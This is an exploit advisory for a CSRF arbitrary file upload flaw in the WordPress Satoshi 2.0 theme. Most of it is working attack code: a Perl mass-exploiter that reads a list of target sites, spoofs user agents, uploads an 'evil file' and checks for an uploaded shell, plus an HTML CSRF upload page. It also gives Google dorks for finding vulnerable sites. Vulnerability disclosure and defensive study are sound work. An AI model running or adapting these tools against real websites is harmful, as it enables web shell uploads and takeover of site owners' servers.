WordPress Satoshi 2.0 Cross Site Request Forgery / File Upload

`####################################################################  
  
# Exploit Title : WordPress Satoshi Themes 2.0 CSRF Arbitrary File Upload  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 05/06/2019  
# Vendor Homepage : vooshthemes.com - tecnoge.com - netsons.com  
# WordPress Affected Versions : 4.7.13 - 3.4.2  
# Theme Affected Version : 2.0  
# Information Link : themesinfo.com/satoshi-theme-wordpress-portfolio-jpx  
themesinfo.com/?search_type=folder&search=satoshi  
# Theme used on : 106 websites  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : intext:Design By Voosh Themes  
inurl:/wp-content/themes/satoshi/ - intext:Design By TecnoGe Informatica -   
# Vulnerability Type :   
CWE-352 [ Cross-Site Request Forgery (CSRF) ]  
CWE-264 [ Permissions, Privileges, and Access Controls ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Description About Software :  
*****************************  
Satoshi v2.0 theme WordPress portfolio. A Free Portfolio Theme Developed By Voosh Themes.  
  
####################################################################  
  
# Impact :  
***********  
WordPress 3.4.2/4.7.13 Satoshi Themes 2.0 is prone to a vulnerability that lets attackers   
upload arbitrary files because it fails to adequately sanitize user-supplied input.   
An attacker can exploit this vulnerability to upload arbitrary code and execute  
it in the context of the webserver process. This may facilitate unauthorized access   
or privilege escalation; other attacks are also possible. This WordPress Theme is  
vulnerable to CSRF file upload via ajaxupload.3.5.js. CSRF occurs when the web application   
does not, or can not, sufficiently verify whether a well-formed, valid, consistent request   
was intentionally provided by the user who submitted the request.  
  
####################################################################  
  
# Vulnerability :  
***************  
/wp-content/themes/satoshi/upload-file.php  
  
Vulnerability Message :  
*********************  
error  
  
Directory File Path :  
******************  
/wp-content/themes/satoshi/images/[YOURFILENAME].html  
  
# Arbitrary File Upload / Unauthorized File Insert Perl Exploiter :  
********************************************************  
#!/usr/bin/perl  
use LWP::UserAgent;  
# Coded By KingSkrupellos  
# Cyberizm Digital Security Army  
# Perl Exploiter By CyBeRiZM :)  
my $qqvul ="/upload-file.php";#theme path vul  
my $datestring = localtime();  
($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();  
  
sub randomagent {  
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',  
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',  
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',  
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',  
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',  
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'  
);  
my $random = $array[rand @array];  
return($random);  
}  
flag();  
print "[+] Enter List Of Target : ";  
chomp (my $list=<>);  
print "[+] Enter Evil File : ";  
chomp (my $file=<>);  
print "[+] Started : $datestring\n";  
open(my $arq,'<'.$list) || die($!);  
my @site = <$arq>;  
@site = grep { !/^$/ } @site;  
close($arq);  
print "[".($#site+1)."] URL to test upload\n\n";   
my $i;  
foreach my $web(@site){$i++;  
chomp($web);  
if($web !~ /^(http|https):\/\//){  
$web = 'http://'.$web;  
}  
print "[$i] $web \n";  
expqq($web);#exploiting website :)  
}   
sub expqq{  
my $useragent = randomagent();#Get a Random User Agent   
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept   
$ua->timeout(10);  
$ua->agent($useragent);  
print "[Testing] Exploit Existence \n";  
my $url = $_[0]."/wp-content/themes/satoshi/".$qqvul;  
my $ss = $_[0]."/wp-content/themes/satoshi/images/".$file;  
my $response = $ua->get($url);  
if ($response->is_success || $response->content=~/error/){  
print "[OK] Exploit Exists\n";  
print "[*] Sent payload\n";  
my $regex = 'success';  
my $body = $ua->post( $url,  
Content_Type => 'form-data',  
Content => [ 'uploadfile' => ["$file"] ]  
);  
if ($body->is_success ||$body->content=~ /$regex/){  
print "[+] Payload successfully executed\n";  
print "[*] Checking if shell was uploaded\n\n";  
my $res = $ua->get($ss);  
if ($res->is_success){  
print "[Upload] $_[0]/wp-content/satoshi/images/$file\n";  
}  
else {  
print "[Faild] check file\n";  
}  
}   
else {print "[-] Payload failed : Not vulnerable\n";  
}  
}  
else {  
print "[No] Exploit Not Found\n";  
}  
}  
sub flag {print "\n[+] WP Satoshi Theme File Upload Exploiter By Cyberizm Digital Security Team \n[*] Coder => Cyberizm \n\n";  
}  
  
####################################################################  
  
Cross Site Request Forgery CSRF Exploiter :  
*****************************************  
<!DOCTYPE html>  
<html>  
<head>  
<meta http-equiv="content-type" content="text/html; charset=UTF-8">  
<title></title>  
<script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>  
<script type='text/javascript' src="http://localhost/wp-content/themes/satoshi/js/ajaxupload.3.5.js"></script>  
  
<script type='text/javascript'>//<![CDATA[   
window.onload=function(){  
  
$(function(){  
var btnUpload=$('#upload');  
var status=$('#logo-upload-status');  
new AjaxUpload(btnUpload, {  
action: 'http://localhost/wp-content/themes/satoshi/upload-file.php',  
name: 'uploadfile',  
onSubmit: function(file, ext){  
/*  
if (! (ext && /^(jpg|png|jpeg|gif|html|txt)$/.test(ext))){   
// extension is not allowed   
status.text('Only HTML,TXT, JPG, PNG or GIF files are allowed');  
return false;  
}*/  
status.text('Uploading...');  
},  
onComplete: function(file, response){  
//On completion clear the status  
status.text('');  
//Add uploaded file to list  
if(response==="success"){  
$('<li></li>').appendTo('#files').html('<img src="http://localhost/wp-content/themes/satoshi/images/'+file+'" alt="" /><br />'+file).addClass('success');  
$('#satoshi_logo_image').val(file);  
} else{  
$('<li></li>').appendTo('#files').text(file).addClass('error');  
}  
}  
});  
  
});  
}//]]>   
</script>  
  
</head>  
<body>  
  
<span id="logo-upload-status"></span>  
<input class="logo-name" id="satoshi_logo_image" type="text" name="satoshi_logo_image" value="">  
<input type="button" class="background_pattern_button" id="upload" value="Choose Logo">  
  
</body>  
</html>  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`